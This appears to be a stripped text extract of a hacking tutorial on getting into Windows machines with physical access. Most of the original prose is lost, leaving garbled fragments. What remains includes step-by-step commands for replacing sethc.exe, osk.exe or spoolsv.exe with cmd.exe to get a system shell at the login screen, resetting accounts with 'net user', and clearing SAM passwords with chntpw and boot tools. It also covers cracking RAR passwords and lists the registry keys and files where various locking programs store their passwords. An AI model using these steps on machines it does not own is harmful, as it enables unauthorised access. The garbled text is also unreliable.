
Windows Hacking and Security Book


Only Physical Access
Lesson 2

Author :

Moslem Haghighian
L4tr0d3ctism

Location :

Sanandaj

L4tr0d3ctism(47)Y4h00com , L4tr0d3ctism(47)H0tm4ilcom , L4tr0d3ctism(47)Gm4ilcom

Spider Security Team

Greeting to :
SHabgard Digital Security Groups Members

Black Hat Group Security Center members

L4tr0d3ctisn@yahoo.com , l4tr0d3ctism@gmail.com , L4tr0d3ctism@hotmail.com

SpideR

administrator

User Accounts (Control Userpasswords2)
Local Users And Groups (lusrmgr.msc)
Net User Command

syskey
Syskey Administrator
guest administrators
Welcome Screen

-

Active@ Password Changer

Ubuntu Live CD

NTPswd

PC Login Now

Windows Login Password Professional

Winrar

-

Access Administrator

1 Click And Lock

Program Protector

Ashampoo Magical Security

Anfibia Deskman

Access lock

Private Encryption

XP Smoker

Lock My Pc

PC Security Tweaker

PC Security

Securr Browser

Password Door

FolderMage Pro

Stealth Encrypto

Private Desktop

nod32

USB Disk Security

Hide My Folders

Private Pix

Clear Lock

Security Administrator

Anti porn

FolderGuard







User name,

... Login , Id , User Id . Moslem
Admin Member



Administrator , Guest

Guest

administrator

System .



3
- 1
- 2
- 3

3

Administrator

power users



: Sharing .

Guests

backup operators

network configuration

operators

remote desktop users

replicator group

replication
. DC
.

users group


.
.

debugger users

help service groups


.
.

every one

authenticated

users
anonymous log

( )

on

creator owner

...

dial up

interactive group

Network group



Administrator .

Power Users

administrator
.
.

User , Password

. .
DataBase

DB

LSA (Local Security Authority) .
LSA SAM
( SAM DB )
Desktop
.
Administrator .


administrator

XP

Welcome Screen

administrator (

Alt + Ctrl + Double

Delete

User name : administrator .


administrator
.
7 administrator

.

Net User Administrator password /active:yes

:
Administrator
.

.



.
Power User administrator
. .
.

User Accounts (Control Userpasswords2)


Run Control Userpasswords2 .
. Reset
...Password (. )


Local Users And Groups (lusrmgr.msc)


. lusrmgr.msc Run

UserS
Set Password ... Proceed .
( )

Net User Command


Run Ms-Dos
Net User AccountName Password
AccountsName Password
.
spider .
Net User Spider p4ssw0rd
Spider p4ssw0rd .
:2

Account 1sp1d3r t34m .
: 1
: 2

: 3 ""

"U S E R" "P a S s W o R d"Net user
Spider Team ( )
: 4 ""
Net User User
.


.
Guests
.

.
Local And Users Groups Users
Properties ( ( Member Of

Add Select Groups ...Advanced


.

Administrator .
20

. PSW
.
User Account
Prevent a Forgotten password (
).

Next .

20

Next

.
UsB Format .

Next .



Next .

Next
Next Finish .


Switch User
Administrator
.


Password Hint .


syskey
Limit Guest
Syskey
.
.


Syskey Administrator

.

bootable

.

%windir%\repair
%windir%\system32\config

.
Administrator Syskey

. 7 Regback Config

Repair
.

guest administrators
sysshell
Spoolsv System32 . Spoolsv .
fat Fat32 .

Spoolsv

spoolsv

.
A:\> copy c:\windows\system32\spoolsv.exe c:\spoolsv.exe
spoolsv C:\
spoolsv System32 .
A:\> copy spoolsv.exe c:\windows\system32\spoolsv.exe
Guest
Administrator Net user administrator l4tr0d3ctism
administrator L4tr0d3ctism .
Spoolsv Spoolsv
.
copy c:\spoolsv.exe c:\windows\system32\spoolsv.exe
Del C:\spoolsv.exe
ntfs


Boot spoolsv .
$mnt/nt1/spoolsv.exef/ cp /mnt/windows/system32/spoolsv.exe

spoolsv system32
nt1
C:\ .
Spoolsv
$mnt/nt1/windows/system32/spoolsv.exe/ sc /mnt/nt1/spoolsv.exe
guest

Guest Syskey .

Welcome Screen
Welcome Screen Exe
.
Welcome screen
System .

System .
Welcome screen .
.
Seven

Displayswitch.exe sethc.exe narrator.exe magnify.exe OSK.exe - utilman.exe

XP

sethc.exe msswchx.exe osk.exe Magnify.exe narrator.exe utilman.exe

1 exe Exe


Shell(text1.text)

OSK.exe bootable
BOOT OSK.EXE SYSTEM32 OSK
. Boot

Copy C:\windows\system32\OSK.exe C:\osk.exe

Copy Drive:\osk.exe C:\windows\system32\osk.exe

OSK.exe C:\
.

Welcome Screen Win + U

. on Screen

keyboard .

Run Taskmgr- regedit cmd


... explorer .

Taskmgr

Cmd

Regedit

explorer System Seven .

CMD.exe
. CMD.exe Sethc.exe .

Sethc.exe Shift
.

5 6 Shift
.
Sethc.exe
C:\Windows\System32\Sethc.exe
CMD.exe Sethc.exe System32 .
.
copy c:\windows\system32\sethc.exe c:\sethc.exe
copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

Ren c:\windows\system32\sethc.exe sethc1.exe

Ren c:\windows\system32\cmd.exe sethc.exe

5 Shift
CMD sethc.exe Net User administrator 123
administrator ... .

Safe mode

copy c:\windows\system32\sethc.exe c:\windows\system32\cmd.exe

copy c:\sethc.exe c:\windows\system32\sethc.exe

Ren c:\windows\system32\sethc.exe cmd.exe

Ren c:\windows\system32\sethc1.exe sethc.exe

Syskey .


.
SAM



MD4
( ) MD4 SAM
.

NTFS

NTFS4Dos
Fat32 .

- 1 USB Flash (
)
- 2 Run

SAM

- 3 Sam
- 4 ...

Active@ Password Changer



FAT16 / FAT32 / NTFS / NTFS5
NT / 2000 / XP / 2003 / 2008 / VISTA 64 .

PasswordChanger.exe

SAM .
: Chose The Logical Drive
.
: Search For MS SAM database(S) On All Hard Disks And logical drive

SAM .
.

. Next
.

SAM
Sam .
Vista XP WINDOWS\SYSTEM32\CONFIG .
Next .

administrator
.


Clear This Users Password

Ubuntu Live CD

Ubuntu
live Ubuntu Hiren boots 12 .
Xp (SP1,2,3) , Vista , Seven ,
Windows server (2003 , 2008) . chntpw .

Tab Os System Synaptic Package Manager


.

chntpw

,universe repository .

Synaptic

Package Manage Settings Repositories .

Community-maintained Open Source software (universe)

ReLoad
Open source .

Quick Search chntpw .

. Mark For Installation .

Apply .

APPLY .

.

64 BIT 64 chntpw
Ubuntu . DEB .

http://packages.debian.org/sid/amd64/chntpw/download

.

Applications > Accessories > Terminal


.

cd Downloads
sudo dpkg -i chntpw*

Chntpw Ubuntu
chntpw SAM
. .

.
Places Filesystem .

Title bar .

Terminal Applications > Accessories > Terminal.

cd /media


ls

.

> < CD

cd WINDOWS/system32/config/ Config .

SAM

sudo chntpw SAM


4


1 - Clear (blank) user password
2 - Edit (set new) user password
3 - Promote user (make user an administrator)
4 - Unlock and enable user accounts
1 Y .

sudo chntpw -u <username> SAM


Syskey .

NTPswd
ntpswd

Fat32 NTFS
Xp (sp2-sp3),vista , Seven .
.
.

http://pogostick.net/~pnh/ntpasswd/bootdisk.html

windows 2000 ,


. ISO .

Press ENTER at the boot: prompt, shown above

Load


Enter .

Hive
Config SAM .
Windows\System32\Config Enter

Sam 1 Sam
Enter .

1 Password USER .

.
Administrator
.

.
1 .
2
3 Limited administrator .
- 5 .
- 6 q .
( 1 )


"!"

" ".


RID (Hex)

! .
!
Sam
q Sam .


q .
Y N


Y n


.

Syskey

PC Login Now
PC Login .

NT Vista Xp

Seven . CD Boot

CD Boot
1

2 . Normal Boot
.

load

.
Next .


Sam .



Next .

. .

Windows Login Password Professional
Windows Login Password Professional
.
.
Windows 7/Vista/XP/2008/2003/2000 Server
2008/2003/2000 .

.
Next .

CD

.
.

USB

Burn


USB Flash Start


USB .

Close


USB Flash CD
Sam .

Next


Server 2008 , 2003

Reset

Domain administrator password for Server 2008/2003/2000 Next


.

Next
Reboot .


Winrar


.


winrar
.

Winrar
AES 128

.

Rar .
40% .

Rar ...
... .com Rar
www. .

comment

...

.

Txt ... Inf



.

comment ... (

) Sanandaj
shabgard
shabgard.org
www.shabgard.org
Shabgard
Shabgard.org
www.Shabgard.org
WWW.SHABGARD.ORG


( )
( (
Rar ...
( )
.
Rar SST
( )


" SST.rar + ":


Password : + SST.rar




.
.


123456

12312355555

.

... zerangtarinam
90%

. :

...

winrar password recovery

winrar password remover

Winrar

... Password Cracker


2 .


1 ( ) Dictionary
2 ( ) Brute Force

Dictionary

DB


.


.
TXT
.

brute force
1
20 100%
Winrar

{| s04(#P5?< R 13

4 -3 .
. D :

Brute force



.

...

1000

0000

Client1

2000

1001

Client2

3000

2001

Client3

4000

3001

Client4

4001

Client5
Client6
Client7
...

.
.

) .
:d ............. .

Access Administrator
.
HKEY_LOCAL_MACHINE\SOFTWARE\Access Administrator
f94b2aa 281744411 .

1 Click And Lock


.
HKEY_CURRENT_USER\Software\Microsoft\Secsys\pm
PWD "" Null .

Program Protector
.
HKEY_LOCAL_MACHINE\SOFTWARE\Karlis Blumentals\Program Protector\3.0
password .


Ashampoo Magical Security


.
HKEY_CURRENT_USER\Software\Ashampoo\Ashampoo Magical Security 2
. prevPasswordHash

Anfibia Deskman

C:\users\ All Users\Application Data\Deskman9\
. deskman.dat

Access lock

C:\users\ All Users\Application Data\Access Lock
. f2c01301.dat


Private Encryption
dwphtlts.dvr Show Hidden My Documents
.

HKEY_CURRENT_USER\Software\Microsoft\trsys\copp\
u

HKEY_CURRENT_USER\Software\Microsoft\trsys\copp\
. t

XP Smoker

HKEY_LOCAL_MACHINE\SOFTWARE\WareSoft Software\XP Smoker
. Password Set

Lock My Pc

HKEY_LOCAL_MACHINE\SOFTWARE\FSPro Labs\Lock My PC 4
. hkSm


PC Security Tweaker

HKEY_LOCAL_MACHINE\SOFTWARE\PC Security Tweaker

DEFAOPTIONS

1st Security Agent

HKEY_LOCAL_MACHINE\SOFTWARE\1st Security Agent
. DEFAOPTIONS

PC Security
X:\windows
gercescp.dvr
dwpces23.dru

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\trsys\copp\
S

Securr Browser
X:\windows
gerwrbes.dvr

b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Secsys\copp

Password Door
. End TLPD.exe

X:\User\All Users\Application Data\TopLang\Password Door
. PDoor.dat


FolderMage Pro

X:\windows\deff1.dat

Stealth Encrypto

X:\windows
.
GERHTS61.DRU
DWPHTS61.DRU

Private Desktop

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\trsys\pd
p

X:\windows
gerkseds.dvr .

nod32
. Safemode
HKEY_LOCAL_MACHINE\SOFTWARE\ESET\ESET Security\CurrentVersion\Info
. PackageID

USB Disk Security



HKEY_LOCAL_MACHINE\SOFTWARE\ZbshaLab\USBGuard
. pwd

Hide My Folders

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\H FCore
. Password

Private Pix

HKEY_CURRENT_USER\Software\Microsoft\Secsys\pm
. pwd

Clear Lock

HKEY_LOCAL_MACHINE\SOFTWARE\1st Security Agent
DEFAOPTIONS

Security Administrator

HKEY_LOCAL_MACHINE\SOFTWARE\Security Administrator
DEFAOPTIONS

Anti porn
:D
:d
Safe mode
X:\windows\Eleathe.bmp

FolderGuard

HKEY_LOCAL_MACHINE\SOFTWARE\WinAbility\FGD
FGP
X:\Users\All Users\Application Data\Folder Guard
FGp

Spider Security Team
From sanandaj
Author : Moslem Haghighian ( l4tr0d3ctism )
3mail : l4tr0d3ctism@yahoo@gmail@hotmail.com
Special Thanks To :
All SHabgard Digital Security Groups Members
All Black Hat Group Security Center members